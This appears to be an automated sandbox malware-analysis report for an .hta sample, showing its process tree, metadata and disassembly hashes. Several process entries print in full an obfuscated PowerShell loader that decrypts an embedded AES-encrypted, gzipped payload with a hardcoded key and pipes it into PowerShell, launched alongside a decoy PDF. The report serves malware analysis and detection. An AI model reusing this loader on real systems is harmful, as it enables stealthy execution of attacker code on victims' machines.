                          Data Ascii: ;w$|h<h{Ehd{E&G04jsuF_^]U}VWuWjKuYYtj^jJuYY};w$|hQh{Eh{EVuWK}l}ufu}W}YY|;w$|hUh{Ehd{EwujjJuj3PjJu


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:15:30:04
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\mshta.exe
                          Wow64 process (32bit):true
                          Commandline:mshta.exe "C:\Users\user\Desktop\a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta"
                          Imagebase:0x770000
                          File size:13'312 bytes
                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:1
                          Start time:15:30:07
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }
                          Imagebase:0xc0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:2
                          Start time:15:30:07
                          Start date:06/10/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:3
                          Start time:15:30:08
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell -
                          Imagebase:0xa40000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:15:30:08
                          Start date:06/10/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:5
                          Start time:15:30:08
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR
                          Imagebase:0xc0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:6
                          Start time:15:30:08
                          Start date:06/10/2023
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell -
                          Imagebase:0xc0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:7
                          Start time:15:30:11
                          Start date:06/10/2023
                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Research.pdf
                          Imagebase:0x7ff6e8200000
                          File size:5'641'176 bytes
                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:8
                          Start time:15:30:12
                          Start date:06/10/2023
                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Imagebase:0x7ff79c940000
                          File size:3'581'912 bytes
                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:9
                          Start time:15:30:12
                          Start date:06/10/2023
                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1564,i,7959819648417443592,3997577616809760479,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Imagebase:0x7ff79c940000
                          File size:3'581'912 bytes
                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:10
                          Start time:15:30:14
                          Start date:06/10/2023
                          Path:C:\Users\user\putty.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\putty.exe"
                          Imagebase:0x400000
                          File size:495'616 bytes
                          MD5 hash:7A0DFC5353FF6DE7DE0208A29FA2FFC9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, ReversingLabs
                          • Detection: 2%, Virustotal, Browse
                          Reputation:moderate
                          Has exited:false

                          Disassembly

                          Reset < >

                            Executed Functions

                            Function 046D6ABA Relevance: .2, Instructions: 156COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58fdccd0a8a7b17f69a00bde4cea6cd7fb00a4ca9c854c7c72e52cb94a9968ce
                            • Instruction ID: dde1f406d5ca1725b67e232cbd8d0bd6ec62bb4a717f7ccf753d37b2d6e704ad
                            • Opcode Fuzzy Hash: 58fdccd0a8a7b17f69a00bde4cea6cd7fb00a4ca9c854c7c72e52cb94a9968ce
                            • Instruction Fuzzy Hash: AD513874B003188FDB24DF68C850B9DBBB2BF89700F1181A9D9459B395EB71AD82CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 046D7568 Relevance: .1, Instructions: 82COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 62cc9a3c96da944d4348d39d482d8c4af854edf385f4e1d7e50a0ddf22619935
                            • Instruction ID: cbfc01972641d4cea949250d34b926885e6dbfd380287b20aaf63c042f10971e
                            • Opcode Fuzzy Hash: 62cc9a3c96da944d4348d39d482d8c4af854edf385f4e1d7e50a0ddf22619935
                            • Instruction Fuzzy Hash: F0315074E002099FDB14DFA8D851AFDBFB2EF89311F1081AAD515AB350EB356942CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02F1D01D Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1398101243.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2f1d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68f8ce4a35a9e9cadc61a76ae8ed97642f9d9e73fd8fa6e3b6e064e593138edb
                            • Instruction ID: 4d29577a98c0ad6f8971474e5c115039223eac48d3e27dee42516f4b9f975ab6
                            • Opcode Fuzzy Hash: 68f8ce4a35a9e9cadc61a76ae8ed97642f9d9e73fd8fa6e3b6e064e593138edb
                            • Instruction Fuzzy Hash: ED012B729043049FE7104B16CCC0B67BFE8DF41AA5F18C419DE480B186C3789445C7B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02F1D005 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1398101243.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2f1d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ca63a8f19b864239605a1ed434debc381d8900f7897ec3bcc582a9271431de61
                            • Instruction ID: 9f065ee7cb48337c781b8f4aaaa82e79116e58552249bc0d4e394d155735ff7b
                            • Opcode Fuzzy Hash: ca63a8f19b864239605a1ed434debc381d8900f7897ec3bcc582a9271431de61
                            • Instruction Fuzzy Hash: 34015E7240E3C49FD7128B258894B52BFB4DF43664F1D80DBD9888F1A7C2695849C772
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 046D6AC8 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bc99c78ceb372c6b73e7bb5f0481c8c37c02cda264ba4a7df6f945018133ed0
                            • Instruction ID: 17f45e17f253043381ff0699abb6aff838c739334159c09e1086f0daa936132d
                            • Opcode Fuzzy Hash: 2bc99c78ceb372c6b73e7bb5f0481c8c37c02cda264ba4a7df6f945018133ed0
                            • Instruction Fuzzy Hash: EE016230B043289FDB54CB58C800F9ABBF5BF49710F0141D9E945AB391D7B2AD448F52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 046D2DAE Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f4541a773064aeababe52e70a6a918ce051ed5a55b8fa7e536b790c447f5ec9
                            • Instruction ID: 935d85c04df4c7ace2e9bc60fde83c0ca6f261c10eb9ffdfb42f9ef7bde7582f
                            • Opcode Fuzzy Hash: 6f4541a773064aeababe52e70a6a918ce051ed5a55b8fa7e536b790c447f5ec9
                            • Instruction Fuzzy Hash: 1BF0B735A001099FDB15CB98D890AEEF7B1FF88324F208199E515A72A1C736E852CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 046D7578 Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 414ba65d7f1702f2dc2911696fbe524424be7eb4cea99ef71aeb780401d5e2f8
                            • Instruction ID: 7cedb3260be02ef7a9dd92658a810c0baac2acaf2db55bcdbde71dce93173af4
                            • Opcode Fuzzy Hash: 414ba65d7f1702f2dc2911696fbe524424be7eb4cea99ef71aeb780401d5e2f8
                            • Instruction Fuzzy Hash: C7E026B4E0424E9F8F88EFB995411BEFBF5AB48201F10856F9919E3340F63456118F95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 046D7538 Relevance: .0, Instructions: 16COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b6c8e73ba1521ae67f8c50cb795bc1d09959f9b2f09c2deb66d9f0ae9aab5dc8
                            • Instruction ID: 3749d764082478f9edae0e4966f3ddb712b58961dcf3d1e5f06fc7f1a2292848
                            • Opcode Fuzzy Hash: b6c8e73ba1521ae67f8c50cb795bc1d09959f9b2f09c2deb66d9f0ae9aab5dc8
                            • Instruction Fuzzy Hash: B6D05E2004D3C66EE72257F8240A2E0BF799F03309F4D00C7D18945453EA295899E3A7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 04873FE0 Relevance: 3.5, Strings: 2, Instructions: 951COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: zn^$zn^
                            • API String ID: 0-1630707886
                            • Opcode ID: afbfc4ffc64435a85f3e69aecf08fbab2720721c391080acb709656ee53de29e
                            • Instruction ID: 839376b8ba52b66014791ffcf394d08db5741648be8fcc680fdced50865d427a
                            • Opcode Fuzzy Hash: afbfc4ffc64435a85f3e69aecf08fbab2720721c391080acb709656ee53de29e
                            • Instruction Fuzzy Hash: 14923A34A012589FDB05DFA8D494A9DFBB2FF89714F248659E804EB361C735ED82CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04874F98 Relevance: .4, Instructions: 423COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e0bc31bb99c2f7734e9b07f3d568778c203011ffd7739806f88431613e7e2b43
                            • Instruction ID: 2111fc1bfcd38e45be61e36c5f88c8f80271f708f8f48c194b1a0c4501360d98
                            • Opcode Fuzzy Hash: e0bc31bb99c2f7734e9b07f3d568778c203011ffd7739806f88431613e7e2b43
                            • Instruction Fuzzy Hash: 98025F34A05258AFDB05CFA8C894A9EBBB2FF89314F148559E805EB761C735ED81CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04874E1F Relevance: .3, Instructions: 257COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58a4651708335af3a3dc46cfa5680433900a00853204a275c12c838300ff3357
                            • Instruction ID: deafe0c8b2d051f86607dc6b1142cfd2fcf6a06d88cfb3169b3f68bc0653cd76
                            • Opcode Fuzzy Hash: 58a4651708335af3a3dc46cfa5680433900a00853204a275c12c838300ff3357
                            • Instruction Fuzzy Hash: 3291822190E3D45FD703DB28DCB45EA7FB0AF87614B0946C7D480DF1A3D629A948C7A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 048752E1 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4e603972b4ee177ec2bfd29f82d2fb11dd78779a8a32257e84c50773f1524cfa
                            • Instruction ID: 2b8a7c10aedaacd8325a87de77f18d973af72c6a5761e6eb881105ad017d4363
                            • Opcode Fuzzy Hash: 4e603972b4ee177ec2bfd29f82d2fb11dd78779a8a32257e84c50773f1524cfa
                            • Instruction Fuzzy Hash: 5B51E674A00219EFDB05CFA8D494A9DFBB2FF88314F248558E805AB765C775EC82CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04874F88 Relevance: .1, Instructions: 101COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36aa1e8283a29f8f78314c379449d1ed98ce21d061b71beb75be1e2b1a3a6636
                            • Instruction ID: dde8228ccf532f00e4c4b85e0c6a546a2624a016ff0f613a420e1f8024db7edf
                            • Opcode Fuzzy Hash: 36aa1e8283a29f8f78314c379449d1ed98ce21d061b71beb75be1e2b1a3a6636
                            • Instruction Fuzzy Hash: 0D416D74A002449FCB14CF5CC8949AEBBB1EF89310B248A59E915EB7A5C336FC41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04873AE8 Relevance: .1, Instructions: 82COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aced161602182ae889e37b5980038b5223f7b85c5cc6fab1032a897f4f60d231
                            • Instruction ID: c28f576a685cffe1c19041391c6bbff005fa6a35fb256c8850bb55ffb39656ca
                            • Opcode Fuzzy Hash: aced161602182ae889e37b5980038b5223f7b85c5cc6fab1032a897f4f60d231
                            • Instruction Fuzzy Hash: 73315E75A042499FCB05DF5CC8949AAFBB1FF89310B15859AD845EB362C731FC41CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04873B18 Relevance: .1, Instructions: 74COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
